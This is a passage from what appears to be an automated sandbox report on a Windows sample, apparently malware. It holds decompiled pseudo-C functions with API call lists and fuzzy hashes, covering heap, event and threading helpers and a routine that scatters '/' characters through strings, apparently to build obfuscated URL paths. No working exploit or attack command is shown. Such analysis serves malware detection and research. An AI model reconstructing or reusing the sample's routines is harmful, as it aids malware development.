                							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                							_t58 = E001D7E20(_v8 + 1);
                							if(_t58 == 0) {
                								_v12 = 8;
                							} else {
                								_push( &_v16);
                								_push( &_v8);
                								_push(_t58);
                								_push(0x16);
                								_push( *((intOrPtr*)(_t61 + 0x18)));
                								if( *_t60() == 0) {
                									E001DA5FA(_t58);
                									_v12 = GetLastError();
                								} else {
                									 *((char*)(_t58 + _v8)) = 0;
                									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                								}
                							}
                							goto L15;
                						}
                					}
                					SetEvent( *(_t61 + 0x1c));
                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                					_v12 = _t56;
                					if(_t56 != 0) {
                						goto L15;
                					}
                					goto L3;
                					L11:
                					_t42 = E001D66BA( *(_t61 + 0x1c), _t59, 0xea60);
                					_v12 = _t42;
                				} while (_t42 == 0);
                				goto L15;
                			}
















                APIs
                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 001D506A
                • SetEvent.KERNEL32(?), ref: 001D507A
                • GetLastError.KERNEL32 ref: 001D5103
                  • Part of subcall function 001D66BA: WaitForMultipleObjects.KERNEL32(00000002,001DAA28,00000000,001DAA28,?,?,?,001DAA28,0000EA60), ref: 001D66D5
                  • Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606
                • GetLastError.KERNEL32(00000000), ref: 001D5138
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                • String ID:
                • API String ID: 602384898-0
                • Opcode ID: 7009fe1be2d731589c6c684809eeb930fe8a3c3eb7bb3f89f2ff9473fa28146b
                • Instruction ID: 15f2e5af45c1de346787d8bca6a1945fc08e59deb7dfd6b535baaf5fbb1794b4
                • Opcode Fuzzy Hash: 7009fe1be2d731589c6c684809eeb930fe8a3c3eb7bb3f89f2ff9473fa28146b
                • Instruction Fuzzy Hash: 103101B5900709EFDB20DFA5CC84A9EBBB9FB18344F10896BE502A2651D770AA49DF50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 40%
                			E001D8634(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                				intOrPtr _v12;
                				void* _v16;
                				void* _v28;
                				char _v32;
                				void* __esi;
                				void* _t29;
                				void* _t38;
                				signed int* _t39;
                				void* _t40;
                
                				_t36 = __ecx;
                				_v32 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v12 = _a4;
                				_t38 = E001DA7FF(__ecx,  &_v32);
                				if(_t38 != 0) {
                					L12:
                					_t39 = _a8;
                					L13:
                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                						_t16 =  &(_t39[1]); // 0x5
                						_t23 = _t16;
                						if( *_t16 != 0) {
                							E001D2884(_t23);
                						}
                					}
                					return _t38;
                				}
                				if(E001DA762(0x40,  &_v16) != 0) {
                					_v16 = 0;
                				}
                				_t40 = CreateEventA(0x1dd2a8, 1, 0,  *0x1dd344);
                				if(_t40 != 0) {
                					SetEvent(_t40);
                					Sleep(0xbb8);
                					CloseHandle(_t40);
                				}
                				_push( &_v32);
                				if(_a12 == 0) {
                					_t29 = E001D2E7B(_t36);
                				} else {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_t29 = E001D3F60(_t36);
                				}
                				_t41 = _v16;
                				_t38 = _t29;
                				if(_v16 != 0) {
                					E001D8371(_t41);
                				}
                				if(_t38 != 0) {
                					goto L12;
                				} else {
                					_t39 = _a8;
                					_t38 = E001D8C8E( &_v32, _t39);
                					goto L13;
                				}
                			}













                APIs
                • CreateEventA.KERNEL32(001DD2A8,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,001D858E,?,00000001,?), ref: 001D8685
                • SetEvent.KERNEL32(00000000,?,?,?,001D858E,?,00000001,?,00000002,?,?,001D5DBE,?), ref: 001D8692
                • Sleep.KERNEL32(00000BB8,?,?,?,001D858E,?,00000001,?,00000002,?,?,001D5DBE,?), ref: 001D869D
                • CloseHandle.KERNEL32(00000000,?,?,?,001D858E,?,00000001,?,00000002,?,?,001D5DBE,?), ref: 001D86A4
                  • Part of subcall function 001D2E7B: WaitForSingleObject.KERNEL32(00000000,?,?,?,001D86C4,?,001D86C4,?,?,?,?,?,001D86C4,?), ref: 001D2F55
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                • String ID:
                • API String ID: 2559942907-0
                • Opcode ID: eff260a3fb685345dd3bc8f359c2e596c4435a443fc861ecdc5cbd935d7cd945
                • Instruction ID: a5b6c3646c5a4f98590487ffffb02915c796b4ff37129ec73997b30eb977790b
                • Opcode Fuzzy Hash: eff260a3fb685345dd3bc8f359c2e596c4435a443fc861ecdc5cbd935d7cd945
                • Instruction Fuzzy Hash: 59218E77D01219ABCB20BFE488858AEB7BDEB54360B154527FA11A7240DB34DD85CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E001D1239(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                				intOrPtr _v8;
                				void* _v12;
                				void* _v16;
                				intOrPtr _t26;
                				intOrPtr* _t28;
                				intOrPtr _t31;
                				intOrPtr* _t32;
                				void* _t39;
                				int _t46;
                				intOrPtr* _t47;
                				int _t48;
                
                				_t47 = __eax;
                				_push( &_v12);
                				_push(__eax);
                				_t39 = 0;
                				_t46 = 0;
                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                				_v8 = _t26;
                				if(_t26 < 0) {
                					L13:
                					return _v8;
                				}
                				if(_v12 == 0) {
                					Sleep(0xc8);
                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                				}
                				if(_v8 >= _t39) {
                					_t28 = _v12;
                					if(_t28 != 0) {
                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                						_v8 = _t31;
                						if(_t31 >= 0) {
                							_t46 = lstrlenW(_v16);
                							if(_t46 != 0) {
                								_t46 = _t46 + 1;
                								_t48 = _t46 + _t46;
                								_t39 = E001D7E20(_t48);
                								if(_t39 == 0) {
                									_v8 = 0x8007000e;
                								} else {
                									memcpy(_t39, _v16, _t48);
                								}
                								__imp__#6(_v16);
                							}
                						}
                						_t32 = _v12;
                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                					}
                					 *_a4 = _t39;
                					 *_a8 = _t46 + _t46;
                				}
                				goto L13;
                			}















                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: FreeSleepStringlstrlenmemcpy
                • String ID:
                • API String ID: 1198164300-0
                • Opcode ID: c93318ca722128aa6d1d084fe95da1777f041f1817c807e4fdab1aaaded9a7b2
                • Instruction ID: f3c4afdf25598e15ccaf392c62c7879c7b817d0750bf01c4b6293a93bb1737fa
                • Opcode Fuzzy Hash: c93318ca722128aa6d1d084fe95da1777f041f1817c807e4fdab1aaaded9a7b2
                • Instruction Fuzzy Hash: 40213D75A0120AFFCB11DFE8C88499EBBB9FF59311B2041AAE901E7310EB31DA40CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E001D7EBE(unsigned int __eax, void* __ecx) {
                				void* _v8;
                				void* _v12;
                				signed int _t21;
                				signed short _t23;
                				char* _t27;
                				void* _t29;
                				void* _t30;
                				unsigned int _t33;
                				void* _t37;
                				unsigned int _t38;
                				void* _t41;
                				void* _t42;
                				int _t45;
                				void* _t46;
                
                				_t42 = __eax;
                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                				_t38 = __eax;
                				_t30 = RtlAllocateHeap( *0x1dd238, 0, (__eax >> 3) + __eax + 1);
                				_v12 = _t30;
                				if(_t30 != 0) {
                					_v8 = _t42;
                					do {
                						_t33 = 0x18;
                						if(_t38 <= _t33) {
                							_t33 = _t38;
                						}
                						_t21 =  *0x1dd250; // 0x352d7b0e
                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                						 *0x1dd250 = _t23;
                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                						memcpy(_t30, _v8, _t45);
                						_v8 = _v8 + _t45;
                						_t27 = _t30 + _t45;
                						_t38 = _t38 - _t45;
                						_t46 = _t46 + 0xc;
                						 *_t27 = 0x2f;
                						_t13 = _t27 + 1; // 0x1
                						_t30 = _t13;
                					} while (_t38 > 8);
                					memcpy(_t30, _v8, _t38 + 1);
                				}
                				return _v12;
                			}


















                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001D88D3,00000000,?,?,001D2AF0,?,02FA95B0), ref: 001D7EC9
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 001D7EE1
                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001D88D3,00000000,?,?,001D2AF0,?,02FA95B0), ref: 001D7F25
                • memcpy.NTDLL(00000001,?,00000001), ref: 001D7F46
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: f8329f205d6ea09723b17daa8acb3ff3b395f0f0373121d142970fb6563698fe
                • Instruction ID: 09bf9e31933c178b582f0a78fc6ebcea1b1270045629e4688929c5ed69c002a5
                • Opcode Fuzzy Hash: f8329f205d6ea09723b17daa8acb3ff3b395f0f0373121d142970fb6563698fe
                • Instruction Fuzzy Hash: 6911E972A01115BFC7208F69DC84D9EBBAEEBD1360B150277F505D76A0E7709E44D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E001D64A0(intOrPtr _a4, intOrPtr _a8) {
                				char _v20;
                				void* _t8;
                				void* _t13;
                				void* _t16;
                				char* _t18;
                				void* _t19;
                
                				_t19 = 0x27;
                				_t1 =  &_v20; // 0x74666f53
                				_t18 = 0;
                				E001D427C(_t8, _t1);
                				_t16 = E001D7E20(_t19);
                				if(_t16 != 0) {
                					_t3 =  &_v20; // 0x74666f53
                					_t13 = E001D4588(_t3, _t16, _a8);
                					if(_a4 != 0) {
                						__imp__(_a4);
                						_t19 = _t13 + 0x27;
                					}
                					_t18 = E001D7E20(_t19);
                					if(_t18 != 0) {
                						 *_t18 = 0;
                						if(_a4 != 0) {
                							__imp__(_t18, _a4);
                						}
                						__imp__(_t18, _t16);
                					}
                					E001DA5FA(_t16);
                				}
                				return _t18;
                			}










                APIs
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                  • Part of subcall function 001D4588: wsprintfA.USER32 ref: 001D45E4
                • lstrlen.KERNEL32(001D5D90,00000000,00000000,00000027,00000005,00000000,00000000,001D41C3,74666F53,00000000,001D5D90,001DD00C,?,001D5D90), ref: 001D64D6
                • lstrcpy.KERNEL32(00000000,00000000), ref: 001D64FA
                • lstrcat.KERNEL32(00000000,00000000), ref: 001D6502
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                • String ID: Soft
                • API String ID: 393707159-3753413193
                • Opcode ID: c91ace937de50869c74235846d223f9c4dd57e88b883b87b80417690aa018940
                • Instruction ID: 2018bcd189771b6f7c70e9398a09d9f57e003fa3db39cf7efb37351f56a2d568
                • Opcode Fuzzy Hash: c91ace937de50869c74235846d223f9c4dd57e88b883b87b80417690aa018940
                • Instruction Fuzzy Hash: 2501D636101216BBCB127BA8AC84AAF3B6DEF84385F044423F60556241DB35C981C7E1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D8AED(void* __esi) {
                				struct _SECURITY_ATTRIBUTES* _v4;
                				void* _t8;
                				void* _t10;
                
                				_v4 = 0;
                				memset(__esi, 0, 0x38);
                				_t8 = CreateEventA(0, 1, 0, 0);
                				 *(__esi + 0x1c) = _t8;
                				if(_t8 != 0) {
                					_t10 = CreateEventA(0, 1, 1, 0);
                					 *(__esi + 0x20) = _t10;
                					if(_t10 == 0) {
                						CloseHandle( *(__esi + 0x1c));
                					} else {
                						_v4 = 1;
                					}
                				}
                				return _v4;
                			}







                APIs
                • memset.NTDLL ref: 001D8AFB
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 001D8B10
                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 001D8B1D
                • CloseHandle.KERNEL32(?), ref: 001D8B2F
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: CreateEvent$CloseHandlememset
                • String ID:
                • API String ID: 2812548120-0
                • Opcode ID: 72d3c7d65097fe18b4f0bb6781a4e71c3602a8ec3bb9b4dd076983c7b4f0e734
                • Instruction ID: ebbb972b887287dd9dbace2479a0b0c540cddd23d8156f2af997ead3b5ae624a
                • Opcode Fuzzy Hash: 72d3c7d65097fe18b4f0bb6781a4e71c3602a8ec3bb9b4dd076983c7b4f0e734
                • Instruction Fuzzy Hash: 95F0FEF5105709BFD3106F66DCC4C2BFBACEB95298B114A2FF14682611DA71A8498A60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _malloc.LIBCMT ref: 6E28159F
                  • Part of subcall function 6E280234: __FF_MSGBANNER.LIBCMT ref: 6E280257
                  • Part of subcall function 6E280234: __NMSG_WRITE.LIBCMT ref: 6E28025E
                • std::bad_alloc::bad_alloc.LIBCMT ref: 6E2815C2
                  • Part of subcall function 6E28151B: std::exception::exception.LIBCMT ref: 6E281527
                • std::bad_exception::bad_exception.LIBCMT ref: 6E2815D6
                • __CxxThrowException@8.LIBCMT ref: 6E2815E4
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                • String ID:
                • API String ID: 1802512180-0
                • Opcode ID: 5e226f65ba87d7b52f5ed290a991ac3728be80a806b0ae07e46bc37ccef00f48
                • Instruction ID: 099dc707f8efcac4cd2bb817f67a3c68b44c7e8c2966bfd7279278625c4e0d37
                • Opcode Fuzzy Hash: 5e226f65ba87d7b52f5ed290a991ac3728be80a806b0ae07e46bc37ccef00f48
                • Instruction Fuzzy Hash: F0F0A72980020E6BDF4457E1D8199DF3B7F5F0579DB100816E836560D5DF38AACDC591
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd.LIBCMT ref: 6E283FF8
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __getptd.LIBCMT ref: 6E28400F
                • __amsg_exit.LIBCMT ref: 6E28401D
                • __lock.LIBCMT ref: 6E28402D
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                • String ID:
                • API String ID: 3521780317-0
                • Opcode ID: a82135c4922b3cc903e1d4030d8b05763e2ee38c90e61dd6e498e376799424cc
                • Instruction ID: d56e35e1468af84d36cb9b5a2bd09079da161c53e78bdab47ca22ff819c1b0a5
                • Opcode Fuzzy Hash: a82135c4922b3cc903e1d4030d8b05763e2ee38c90e61dd6e498e376799424cc
                • Instruction Fuzzy Hash: 6FF06D36900A1D9BD725ABF58108B8F72AAAF1071DF104909D8509B2D0CBB0AD4ACA91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E001D804C(void** __esi) {
                				char* _v0;
                				intOrPtr _t4;
                				intOrPtr _t6;
                				void* _t8;
                				intOrPtr _t11;
                				void* _t12;
                				void** _t14;
                
                				_t14 = __esi;
                				_t4 =  *0x1dd32c; // 0x2fa95b0
                				__imp__(_t4 + 0x40);
                				while(1) {
                					_t6 =  *0x1dd32c; // 0x2fa95b0
                					_t1 = _t6 + 0x58; // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t8 =  *_t14;
                				if(_t8 != 0 && _t8 != 0x1dd030) {
                					HeapFree( *0x1dd238, 0, _t8);
                				}
                				_t14[1] = E001D6BC0(_v0, _t14);
                				_t11 =  *0x1dd32c; // 0x2fa95b0
                				_t12 = _t11 + 0x40;
                				__imp__(_t12);
                				return _t12;
                			}











                APIs
                • RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D8055
                • Sleep.KERNEL32(0000000A,?,001D5D85), ref: 001D805F
                • HeapFree.KERNEL32(00000000,00000000,?,001D5D85), ref: 001D8087
                • RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D80A3
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: c1d30ef5d1d7841a20b92fcbc378b9201a707b5f744c24edec6702599af9ce84
                • Instruction ID: d72d84f38c60e611bcdb4a38da0b47ba46a550a1c8a72a860a13aa49bbef8cb3
                • Opcode Fuzzy Hash: c1d30ef5d1d7841a20b92fcbc378b9201a707b5f744c24edec6702599af9ce84
                • Instruction Fuzzy Hash: 9FF0FE74603141EBD7209F78ED89F1677E4AF14740B048917F941D7761CB24E884CB65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D469F() {
                				void* _t1;
                				intOrPtr _t5;
                				void* _t6;
                				void* _t7;
                				void* _t11;
                
                				_t1 =  *0x1dd26c; // 0x23c
                				if(_t1 == 0) {
                					L8:
                					return 0;
                				}
                				SetEvent(_t1);
                				_t11 = 0x7fffffff;
                				while(1) {
                					SleepEx(0x64, 1);
                					_t5 =  *0x1dd2b8; // 0x0
                					if(_t5 == 0) {
                						break;
                					}
                					_t11 = _t11 - 0x64;
                					if(_t11 > 0) {
                						continue;
                					}
                					break;
                				}
                				_t6 =  *0x1dd26c; // 0x23c
                				if(_t6 != 0) {
                					CloseHandle(_t6);
                				}
                				_t7 =  *0x1dd238; // 0x2bb0000
                				if(_t7 != 0) {
                					HeapDestroy(_t7);
                				}
                				goto L8;
                			}









                APIs
                • SetEvent.KERNEL32(0000023C,00000001,001D649A), ref: 001D46AA
                • SleepEx.KERNEL32(00000064,00000001), ref: 001D46B9
                • CloseHandle.KERNEL32(0000023C), ref: 001D46DA
                • HeapDestroy.KERNEL32(02BB0000), ref: 001D46EA
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: CloseDestroyEventHandleHeapSleep
                • String ID:
                • API String ID: 4109453060-0
                • Opcode ID: 7dcd35167cc540435a3c0946a34c17dfb4645bcbb7d77fe70f1dbc9fb23728ff
                • Instruction ID: 0ceea1a3461b2d7f4af186a9cae923cb5adb29e3e50eb8dc81aaea236a318d86
                • Opcode Fuzzy Hash: 7dcd35167cc540435a3c0946a34c17dfb4645bcbb7d77fe70f1dbc9fb23728ff
                • Instruction Fuzzy Hash: 0DF03075A03312D7DB206F75BD48B467B98AB057617050712B806D7BA0DF70D8C0D6A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E001D5DDD() {
                				void* _v0;
                				void** _t3;
                				void** _t5;
                				void** _t7;
                				void** _t8;
                				void* _t10;
                
                				_t3 =  *0x1dd32c; // 0x2fa95b0
                				__imp__( &(_t3[0x10]));
                				while(1) {
                					_t5 =  *0x1dd32c; // 0x2fa95b0
                					_t1 =  &(_t5[0x16]); // 0x0
                					if( *_t1 == 0) {
                						break;
                					}
                					Sleep(0xa);
                				}
                				_t7 =  *0x1dd32c; // 0x2fa95b0
                				_t10 =  *_t7;
                				if(_t10 != 0 && _t10 != 0x1de836) {
                					HeapFree( *0x1dd238, 0, _t10);
                					_t7 =  *0x1dd32c; // 0x2fa95b0
                				}
                				 *_t7 = _v0;
                				_t8 =  &(_t7[0x10]);
                				__imp__(_t8);
                				return _t8;
                			}










                APIs
                • RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D5DE6
                • Sleep.KERNEL32(0000000A,?,001D5D85), ref: 001D5DF0
                • HeapFree.KERNEL32(00000000,?,?,001D5D85), ref: 001D5E1E
                • RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D5E33
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: c46fdffba7f47d52753b9a7a3751aa12bf554be9af868d19ee1871fa444f630e
                • Instruction ID: c4de0dccba2c62931a6935833a9f7847edcbcb712212ed9d64db6036c052244c
                • Opcode Fuzzy Hash: c46fdffba7f47d52753b9a7a3751aa12bf554be9af868d19ee1871fa444f630e
                • Instruction Fuzzy Hash: 64F0DAB8603501EFE7189F68ED99B1677E6EB08341B04451BF902DBB70C734AC80DA21
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd.LIBCMT ref: 6E284D00
                  • Part of subcall function 6E283307: __getptd_noexit.LIBCMT ref: 6E28330A
                  • Part of subcall function 6E283307: __amsg_exit.LIBCMT ref: 6E283317
                • __getptd.LIBCMT ref: 6E284D0E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
                • Instruction ID: 9b689df2e93c90cfe3b88afbdde7a58eb56457c794f2d617600283ce77bad02f
                • Opcode Fuzzy Hash: a4b17a500ebba1ed6a596262de820ffb3c0123df75e8d6968bfa6170fe19f764
                • Instruction Fuzzy Hash: 00014F3480030A8BCB74CFA0D860A9EB7BFBF51216F54491DD0515A5D1CB30968ACB81
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E001D8389(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                				intOrPtr* _v8;
                				void* _t17;
                				intOrPtr* _t22;
                				void* _t27;
                				char* _t30;
                				void* _t33;
                				void* _t34;
                				void* _t36;
                				void* _t37;
                				void* _t39;
                				int _t42;
                
                				_t17 = __eax;
                				_t37 = 0;
                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                				_t2 = _t17 + 1; // 0x1
                				_t28 = _t2;
                				_t34 = E001D7E20(_t2);
                				if(_t34 != 0) {
                					_t30 = E001D7E20(_t28);
                					if(_t30 == 0) {
                						E001DA5FA(_t34);
                					} else {
                						_t39 = _a4;
                						_t22 = E001DA8C7(_t39);
                						_v8 = _t22;
                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                							_a4 = _t39;
                						} else {
                							_t26 = _t22 + 2;
                							_a4 = _t22 + 2;
                							_t22 = E001DA8C7(_t26);
                							_v8 = _t22;
                						}
                						if(_t22 == 0) {
                							__imp__(_t34, _a4);
                							 *_t30 = 0x2f;
                							 *((char*)(_t30 + 1)) = 0;
                						} else {
                							_t42 = _t22 - _a4;
                							memcpy(_t34, _a4, _t42);
                							 *((char*)(_t34 + _t42)) = 0;
                							__imp__(_t30, _v8);
                						}
                						 *_a8 = _t34;
                						_t37 = 1;
                						 *_a12 = _t30;
                					}
                				}
                				return _t37;
                			}















                APIs
                • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,001D5741,?,?,?,?,00000102,001D6187,?,?,00000000), ref: 001D8395
                  • Part of subcall function 001D7E20: RtlAllocateHeap.NTDLL(00000000,00000000,001D8112), ref: 001D7E2C
                  • Part of subcall function 001DA8C7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,001D83C3,00000000,00000001,00000001,?,?,001D5741,?,?,?,?,00000102), ref: 001DA8D5
                  • Part of subcall function 001DA8C7: StrChrA.SHLWAPI(?,0000003F,?,?,001D5741,?,?,?,?,00000102,001D6187,?,?,00000000,00000000), ref: 001DA8DF
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001D5741,?,?,?,?,00000102,001D6187,?), ref: 001D83F3
                • lstrcpy.KERNEL32(00000000,00000000), ref: 001D8403
                • lstrcpy.KERNEL32(00000000,00000000), ref: 001D840F
                Memory Dump Source
                • Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp
                • Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp
                • Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: 22109cd8215da9dea32bd0226a00baa61aa00a00c059319d1f1c12b09f28697b
                • Instruction ID: 30ff820f00de0286c790742251cefb9f6d0a0aac0534f7f081538e1a961ba473
                • Opcode Fuzzy Hash: 22109cd8215da9dea32bd0226a00baa61aa00a00c059319d1f1c12b09f28697b
                • Instruction Fuzzy Hash: 5021AF72504256FFCB12AF74DC84BAF7FA8AF26380B158056F9059B342DB35C941D7A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E001D8FE0(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                				void* _v8;
                				void* _t18;
                				int _t25;
                				int _t29;
                				int _t34;
                
                				_t29 = lstrlenW(_a4);
                				_t25 = lstrlenW(_a8);
                				_t18 = E001D7E20(_t25 + _t29 + _t25 + _t29 + 2);
                				_v8 = _t18;
                				if(_t18 != 0) {
                					_t34 = _t29 + _t29;
                					memcpy(_t18, _a4, _t34);
